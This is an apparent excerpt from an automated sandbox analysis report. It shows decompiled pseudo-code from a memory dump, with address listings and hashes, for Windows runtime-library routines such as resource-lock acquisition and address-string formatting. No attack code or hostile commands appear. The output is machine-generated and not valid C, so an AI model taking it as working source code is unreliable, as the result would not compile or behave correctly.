                                                                                                                                                            															L2:
                                                                                                                                                            															return _t63;
                                                                                                                                                            														} else {
                                                                                                                                                            															_push(_t63);
                                                                                                                                                            															E02213915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                            															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                            															_push( &_a4);
                                                                                                                                                            															_push(1);
                                                                                                                                                            															_t63 = E021CF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                            															__eflags = _t63;
                                                                                                                                                            															if(__eflags >= 0) {
                                                                                                                                                            																goto L2;
                                                                                                                                                            															} else {
                                                                                                                                                            																_push(_t63);
                                                                                                                                                            																_t66 = E02213915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                            																asm("int3");
                                                                                                                                                            																while(1) {
                                                                                                                                                            																	_t110 = _t66;
                                                                                                                                                            																	__eflags = _t66 - 1;
                                                                                                                                                            																	if(_t66 != 1) {
                                                                                                                                                            																		break;
                                                                                                                                                            																	}
                                                                                                                                                            																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                            																	_t66 = _t110;
                                                                                                                                                            																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                            																	__eflags = _t66 - _t110;
                                                                                                                                                            																	if(_t66 != _t110) {
                                                                                                                                                            																		continue;
                                                                                                                                                            																	} else {
                                                                                                                                                            																		_t67 =  *[fs:0x18];
                                                                                                                                                            																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                            																		return _t67;
                                                                                                                                                            																	}
                                                                                                                                                            																	goto L58;
                                                                                                                                                            																}
                                                                                                                                                            																E021F5329(_t110, _t138);
                                                                                                                                                            																return E021F53A5(_t138, 1);
                                                                                                                                                            															}
                                                                                                                                                            														}
                                                                                                                                                            													}
                                                                                                                                                            												}
                                                                                                                                                            											} else {
                                                                                                                                                            												_t56 =  *(_t96 + 0x28);
                                                                                                                                                            												goto L3;
                                                                                                                                                            											}
                                                                                                                                                            										} else {
                                                                                                                                                            											_t107 =  *_t119;
                                                                                                                                                            											__eflags = _t107;
                                                                                                                                                            											if(__eflags > 0) {
                                                                                                                                                            												while(1) {
                                                                                                                                                            													_t81 = _t107;
                                                                                                                                                            													asm("lock cmpxchg [edi], esi");
                                                                                                                                                            													__eflags = _t81 - _t107;
                                                                                                                                                            													if(_t81 == _t107) {
                                                                                                                                                            														break;
                                                                                                                                                            													}
                                                                                                                                                            													_t107 = _t81;
                                                                                                                                                            													__eflags = _t81;
                                                                                                                                                            													if(_t81 > 0) {
                                                                                                                                                            														continue;
                                                                                                                                                            													}
                                                                                                                                                            													break;
                                                                                                                                                            												}
                                                                                                                                                            												_t56 = _a4;
                                                                                                                                                            												__eflags = _t107;
                                                                                                                                                            											}
                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                            												while(1) {
                                                                                                                                                            													L3:
                                                                                                                                                            													__eflags = _t56;
                                                                                                                                                            													if(_t56 != 0) {
                                                                                                                                                            														goto L32;
                                                                                                                                                            													}
                                                                                                                                                            													_t107 = _t107 | 0xffffffff;
                                                                                                                                                            													_t56 = 0;
                                                                                                                                                            													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                            													__eflags = 0;
                                                                                                                                                            													if(0 != 0) {
                                                                                                                                                            														continue;
                                                                                                                                                            													} else {
                                                                                                                                                            														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                            														return 1;
                                                                                                                                                            													}
                                                                                                                                                            													goto L58;
                                                                                                                                                            												}
                                                                                                                                                            												continue;
                                                                                                                                                            											} else {
                                                                                                                                                            												goto L40;
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            										goto L58;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags = 0;
                                                                                                                                                            									return 0;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t115 =  *(_t96 + 0x28);
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t106 =  *_t49;
                                                                                                                                                            								__eflags = _t106;
                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                            									while(1) {
                                                                                                                                                            										_t93 = _t106;
                                                                                                                                                            										asm("lock cmpxchg [edi], esi");
                                                                                                                                                            										__eflags = _t93 - _t106;
                                                                                                                                                            										if(_t93 == _t106) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										_t106 = _t93;
                                                                                                                                                            										__eflags = _t93;
                                                                                                                                                            										if(_t93 > 0) {
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags = _t106;
                                                                                                                                                            								}
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									goto L23;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L58;
                                                                                                                                                            					}
                                                                                                                                                            					_t84 = _t115;
                                                                                                                                                            					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                            					__eflags = _t84 - _t115;
                                                                                                                                                            					if(_t84 != _t115) {
                                                                                                                                                            						_t115 = _t84;
                                                                                                                                                            						goto L7;
                                                                                                                                                            					} else {
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L58:
                                                                                                                                                            			}



































                                                                                                                                                            0x02232320
                                                                                                                                                            0x02232323
                                                                                                                                                            0x02232323
                                                                                                                                                            0x02232328
                                                                                                                                                            0x0223232d
                                                                                                                                                            0x0223232f
                                                                                                                                                            0x02232331
                                                                                                                                                            0x02232336
                                                                                                                                                            0x02232336
                                                                                                                                                            0x0223233b
                                                                                                                                                            0x0223233d
                                                                                                                                                            0x02232350
                                                                                                                                                            0x02232351
                                                                                                                                                            0x02232356
                                                                                                                                                            0x02232359
                                                                                                                                                            0x02232359
                                                                                                                                                            0x0223235b
                                                                                                                                                            0x0223235d
                                                                                                                                                            0x021f5367
                                                                                                                                                            0x021f536b
                                                                                                                                                            0x021f5372
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02232363
                                                                                                                                                            0x02232363
                                                                                                                                                            0x02232369
                                                                                                                                                            0x0223236a
                                                                                                                                                            0x0223236c
                                                                                                                                                            0x02232371
                                                                                                                                                            0x02232373
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02232379
                                                                                                                                                            0x02232379
                                                                                                                                                            0x0223237a
                                                                                                                                                            0x0223237f
                                                                                                                                                            0x0223237f
                                                                                                                                                            0x02232385
                                                                                                                                                            0x02232386
                                                                                                                                                            0x02232389
                                                                                                                                                            0x0223238e
                                                                                                                                                            0x02232390
                                                                                                                                                            0x021f5378
                                                                                                                                                            0x021f537c
                                                                                                                                                            0x02232396
                                                                                                                                                            0x02232396
                                                                                                                                                            0x02232397
                                                                                                                                                            0x0223239c
                                                                                                                                                            0x022323a2
                                                                                                                                                            0x022323a3
                                                                                                                                                            0x022323a6
                                                                                                                                                            0x022323ab
                                                                                                                                                            0x022323ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022323b3
                                                                                                                                                            0x022323b3
                                                                                                                                                            0x022323b4
                                                                                                                                                            0x022323b9
                                                                                                                                                            0x022323ba
                                                                                                                                                            0x022323ba
                                                                                                                                                            0x022323bc
                                                                                                                                                            0x022323bf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02229153
                                                                                                                                                            0x02229158
                                                                                                                                                            0x0222915a
                                                                                                                                                            0x0222915e
                                                                                                                                                            0x02229160
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02229166
                                                                                                                                                            0x02229166
                                                                                                                                                            0x02229171
                                                                                                                                                            0x02229176
                                                                                                                                                            0x02229176
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02229160
                                                                                                                                                            0x022323c6
                                                                                                                                                            0x022323d7
                                                                                                                                                            0x022323d7
                                                                                                                                                            0x022323ad
                                                                                                                                                            0x02232390
                                                                                                                                                            0x02232373
                                                                                                                                                            0x0223233f
                                                                                                                                                            0x0223233f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223233f
                                                                                                                                                            0x02232291
                                                                                                                                                            0x02232291
                                                                                                                                                            0x02232293
                                                                                                                                                            0x02232295
                                                                                                                                                            0x0223229a
                                                                                                                                                            0x022322a1
                                                                                                                                                            0x022322a3
                                                                                                                                                            0x022322a7
                                                                                                                                                            0x022322a9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322ab
                                                                                                                                                            0x022322ad
                                                                                                                                                            0x022322af
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322af
                                                                                                                                                            0x022322b1
                                                                                                                                                            0x022322b4
                                                                                                                                                            0x022322b4
                                                                                                                                                            0x022322b6
                                                                                                                                                            0x021f53be
                                                                                                                                                            0x021f53be
                                                                                                                                                            0x021f53be
                                                                                                                                                            0x021f53c0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f53cb
                                                                                                                                                            0x021f53ce
                                                                                                                                                            0x021f53d0
                                                                                                                                                            0x021f53d4
                                                                                                                                                            0x021f53d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f53d8
                                                                                                                                                            0x021f53e3
                                                                                                                                                            0x021f53ea
                                                                                                                                                            0x021f53ea
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f53d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322b6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223228f
                                                                                                                                                            0x02232349
                                                                                                                                                            0x0223234d
                                                                                                                                                            0x02232251
                                                                                                                                                            0x02232251
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02232251
                                                                                                                                                            0x022321a4
                                                                                                                                                            0x022321a4
                                                                                                                                                            0x022321a6
                                                                                                                                                            0x022321a8
                                                                                                                                                            0x022321ac
                                                                                                                                                            0x022321b6
                                                                                                                                                            0x022321b8
                                                                                                                                                            0x022321bc
                                                                                                                                                            0x022321be
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022321c0
                                                                                                                                                            0x022321c2
                                                                                                                                                            0x022321c4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022321c4
                                                                                                                                                            0x022321c6
                                                                                                                                                            0x022321c6
                                                                                                                                                            0x022321c8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022321c8
                                                                                                                                                            0x022321a2

                                                                                                                                                            APIs
                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02232206
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                            • API String ID: 885266447-4236105082
                                                                                                                                                            • Opcode ID: 4b9b7a3839331d8762c6dd056b2441ed33655dfe32ccc4883005a541dcbd6631
                                                                                                                                                            • Instruction ID: fcc098324f7c7352ffbb5095165cf8afb9b136b3f34aea166adc8d0735f6cbf4
                                                                                                                                                            • Opcode Fuzzy Hash: 4b9b7a3839331d8762c6dd056b2441ed33655dfe32ccc4883005a541dcbd6631
                                                                                                                                                            • Instruction Fuzzy Hash: F8513D71760312ABEB25CE98DC80F6633AAAF94710F214359ED55DB289DB71EC418B90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                            			E022114C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				char _v10;
                                                                                                                                                            				char _v140;
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t24;
                                                                                                                                                            				void* _t26;
                                                                                                                                                            				signed int _t29;
                                                                                                                                                            				signed int _t34;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            				intOrPtr* _t52;
                                                                                                                                                            				void* _t54;
                                                                                                                                                            				signed int _t57;
                                                                                                                                                            				void* _t58;
                                                                                                                                                            
                                                                                                                                                            				_t51 = __edx;
                                                                                                                                                            				_t24 =  *0x22b2088; // 0x7769ef74
                                                                                                                                                            				_v8 = _t24 ^ _t57;
                                                                                                                                                            				_t45 = _a16;
                                                                                                                                                            				_t53 = _a4;
                                                                                                                                                            				_t52 = _a20;
                                                                                                                                                            				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                            					L10:
                                                                                                                                                            					_t26 = 0xc000000d;
                                                                                                                                                            				} else {
                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                            						if( *_t52 == _t45) {
                                                                                                                                                            							goto L3;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						L3:
                                                                                                                                                            						_t28 =  &_v140;
                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                            							_push("[");
                                                                                                                                                            							_push(0x41);
                                                                                                                                                            							_push( &_v140);
                                                                                                                                                            							_t29 = E02207707();
                                                                                                                                                            							_t58 = _t58 + 0xc;
                                                                                                                                                            							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                            						}
                                                                                                                                                            						_t54 = E022113CB(_t53, _t28);
                                                                                                                                                            						if(_a8 != 0) {
                                                                                                                                                            							_t34 = E02207707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                            							_t58 = _t58 + 0x10;
                                                                                                                                                            							_t54 = _t54 + _t34 * 2;
                                                                                                                                                            						}
                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                            							_t40 = E02207707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                            							_t58 = _t58 + 0x10;
                                                                                                                                                            							_t54 = _t54 + _t40 * 2;
                                                                                                                                                            						}
                                                                                                                                                            						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                            						 *_t52 = _t53;
                                                                                                                                                            						if( *_t52 < _t53) {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						} else {
                                                                                                                                                            							E021D2340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                            							_t26 = 0;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return E021DE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                            			}


                                                                                                                                                            APIs
                                                                                                                                                            • ___swprintf_l.LIBCMT ref: 0223EA22
                                                                                                                                                              • Part of subcall function 022113CB: ___swprintf_l.LIBCMT ref: 0221146B
                                                                                                                                                              • Part of subcall function 022113CB: ___swprintf_l.LIBCMT ref: 02211490
                                                                                                                                                            • ___swprintf_l.LIBCMT ref: 0221156D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                                            • Opcode ID: ba36dd7519852c7fe8908acf60451fce4df5bc5dcc22a1e9f7224c25a8eb9584
                                                                                                                                                            • Instruction ID: 29168c078a8fd7d0460b695e4765cb71bdf7995e5ff7e60e016a9d9727522645
                                                                                                                                                            • Opcode Fuzzy Hash: ba36dd7519852c7fe8908acf60451fce4df5bc5dcc22a1e9f7224c25a8eb9584
                                                                                                                                                            • Instruction Fuzzy Hash: 3F21B472920619EBDB21DE94CC40EEA73ECAF20704F444511ED4AD3148EB70AA688BD0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                            			E021F53A5(signed int _a4, char _a8) {
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t32;
                                                                                                                                                            				signed int _t37;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				signed int _t42;
                                                                                                                                                            				void* _t45;
                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                            				signed int _t49;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            				signed int _t57;
                                                                                                                                                            				signed int _t64;
                                                                                                                                                            				signed int _t71;
                                                                                                                                                            				void* _t74;
                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                            				signed int* _t79;
                                                                                                                                                            				void* _t85;
                                                                                                                                                            				signed int _t86;
                                                                                                                                                            				signed int _t92;
                                                                                                                                                            				void* _t104;
                                                                                                                                                            				void* _t105;
                                                                                                                                                            
                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                            				_t32 =  *(_t64 + 0x28);
                                                                                                                                                            				_t71 = _t64 + 0x28;
                                                                                                                                                            				_push(_t92);
                                                                                                                                                            				if(_t32 < 0) {
                                                                                                                                                            					_t78 =  *[fs:0x18];
                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                            					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                            						goto L3;
                                                                                                                                                            					} else {
                                                                                                                                                            						__eflags = _t32 | 0xffffffff;
                                                                                                                                                            						asm("lock xadd [ecx], eax");
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L3:
                                                                                                                                                            					_push(_t86);
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L4:
                                                                                                                                                            						__eflags = _t32;
                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _a8;
                                                                                                                                                            						if(_a8 == 0) {
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							return 0;
                                                                                                                                                            						} else {
                                                                                                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            							_t79 = _t64 + 0x24;
                                                                                                                                                            							_t71 = 1;
                                                                                                                                                            							asm("lock xadd [eax], ecx");
                                                                                                                                                            							_t32 =  *(_t64 + 0x28);
                                                                                                                                                            							_a4 = _t32;
                                                                                                                                                            							__eflags = _t32;
                                                                                                                                                            							if(_t32 != 0) {
                                                                                                                                                            								L19:
                                                                                                                                                            								_t86 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                            									asm("sbb esi, esi");
                                                                                                                                                            									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x022b01c0;
                                                                                                                                                            									_push(_t92);
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_t37 = E021CF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                            									__eflags = _t37 - 0x102;
                                                                                                                                                            									if(_t37 != 0x102) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t71 =  *(_t92 + 4);
                                                                                                                                                            									_t85 =  *_t92;
                                                                                                                                                            									_t51 = E02214FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                            									_push(_t85);
                                                                                                                                                            									_push(_t51);
                                                                                                                                                            									E02223F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                            									E02223F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                            									_t86 = _t86 + 1;
                                                                                                                                                            									_t105 = _t104 + 0x28;
                                                                                                                                                            									__eflags = _t86 - 2;
                                                                                                                                                            									if(__eflags > 0) {
                                                                                                                                                            										E0225217A(_t71, __eflags, _t64);
                                                                                                                                                            									}
                                                                                                                                                            									_push("RTL: Re-Waiting\n");
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_push(0x65);
                                                                                                                                                            									E02223F92();
                                                                                                                                                            									_t104 = _t105 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t37;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t37);
                                                                                                                                                            									E02213915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									_t40 =  *_t71;
                                                                                                                                                            									 *_t71 = 0;
                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                            										L1:
                                                                                                                                                            										_t42 = E021F5384(_t92 + 0x24);
                                                                                                                                                            										if(_t42 != 0) {
                                                                                                                                                            											goto L31;
                                                                                                                                                            										} else {
                                                                                                                                                            											goto L2;
                                                                                                                                                            										}
                                                                                                                                                            									} else {
                                                                                                                                                            										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                            										_push( &_a4);
                                                                                                                                                            										_push(_t40);
                                                                                                                                                            										_t49 = E021CF970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                            										__eflags = _t49;
                                                                                                                                                            										if(__eflags >= 0) {
                                                                                                                                                            											goto L1;
                                                                                                                                                            										} else {
                                                                                                                                                            											_push(_t49);
                                                                                                                                                            											E02213915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                            											L31:
                                                                                                                                                            											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                            											_push( &_a4);
                                                                                                                                                            											_push(1);
                                                                                                                                                            											_t42 = E021CF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                            											__eflags = _t42;
                                                                                                                                                            											if(__eflags >= 0) {
                                                                                                                                                            												L2:
                                                                                                                                                            												return _t42;
                                                                                                                                                            											} else {
                                                                                                                                                            												_push(_t42);
                                                                                                                                                            												E02213915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                            												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                            												_push( &_a4);
                                                                                                                                                            												_push(1);
                                                                                                                                                            												_t42 = E021CF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                            												__eflags = _t42;
                                                                                                                                                            												if(__eflags >= 0) {
                                                                                                                                                            													goto L2;
                                                                                                                                                            												} else {
                                                                                                                                                            													_push(_t42);
                                                                                                                                                            													_t45 = E02213915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                            													asm("int3");
                                                                                                                                                            													while(1) {
                                                                                                                                                            														_t74 = _t45;
                                                                                                                                                            														__eflags = _t45 - 1;
                                                                                                                                                            														if(_t45 != 1) {
                                                                                                                                                            															break;
                                                                                                                                                            														}
                                                                                                                                                            														_t86 = _t86 | 0xffffffff;
                                                                                                                                                            														_t45 = _t74;
                                                                                                                                                            														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                            														__eflags = _t45 - _t74;
                                                                                                                                                            														if(_t45 != _t74) {
                                                                                                                                                            															continue;
                                                                                                                                                            														} else {
                                                                                                                                                            															_t46 =  *[fs:0x18];
                                                                                                                                                            															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                            															return _t46;
                                                                                                                                                            														}
                                                                                                                                                            														goto L37;
                                                                                                                                                            													}
                                                                                                                                                            													E021F5329(_t74, _t92);
                                                                                                                                                            													_push(1);
                                                                                                                                                            													return E021F53A5(_t92);
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									_t32 =  *(_t64 + 0x28);
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t71 =  *_t79;
                                                                                                                                                            								__eflags = _t71;
                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                            									while(1) {
                                                                                                                                                            										_t57 = _t71;
                                                                                                                                                            										asm("lock cmpxchg [edi], esi");
                                                                                                                                                            										__eflags = _t57 - _t71;
                                                                                                                                                            										if(_t57 == _t71) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										_t71 = _t57;
                                                                                                                                                            										__eflags = _t57;
                                                                                                                                                            										if(_t57 > 0) {
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t32 = _a4;
                                                                                                                                                            									__eflags = _t71;
                                                                                                                                                            								}
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									goto L19;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L37;
                                                                                                                                                            					}
                                                                                                                                                            					_t71 = _t71 | 0xffffffff;
                                                                                                                                                            					_t32 = 0;
                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                            					__eflags = 0;
                                                                                                                                                            					if(0 != 0) {
                                                                                                                                                            						goto L4;
                                                                                                                                                            					} else {
                                                                                                                                                            						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L37:
                                                                                                                                                            			}
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322af
                                                                                                                                                            0x022322b1
                                                                                                                                                            0x022322b4
                                                                                                                                                            0x022322b4
                                                                                                                                                            0x022322b6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022322b6
                                                                                                                                                            0x0223228f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223226d
                                                                                                                                                            0x021f53cb
                                                                                                                                                            0x021f53ce
                                                                                                                                                            0x021f53d0
                                                                                                                                                            0x021f53d4
                                                                                                                                                            0x021f53d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f53d8
                                                                                                                                                            0x021f53e3
                                                                                                                                                            0x021f53ea
                                                                                                                                                            0x021f53ea
                                                                                                                                                            0x021f53d6
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022322F4
                                                                                                                                                            Strings
                                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 022322FC
                                                                                                                                                            • RTL: Re-Waiting, xrefs: 02232328
                                                                                                                                                            • RTL: Resource at %p, xrefs: 0223230B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
